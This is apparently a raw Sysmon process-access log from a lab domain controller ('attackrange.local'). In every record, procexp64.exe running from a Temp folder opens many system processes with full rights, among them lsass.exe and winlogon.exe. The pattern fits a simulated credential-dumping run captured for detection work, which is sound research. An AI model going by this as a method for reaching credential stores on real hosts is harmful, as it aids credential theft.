15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 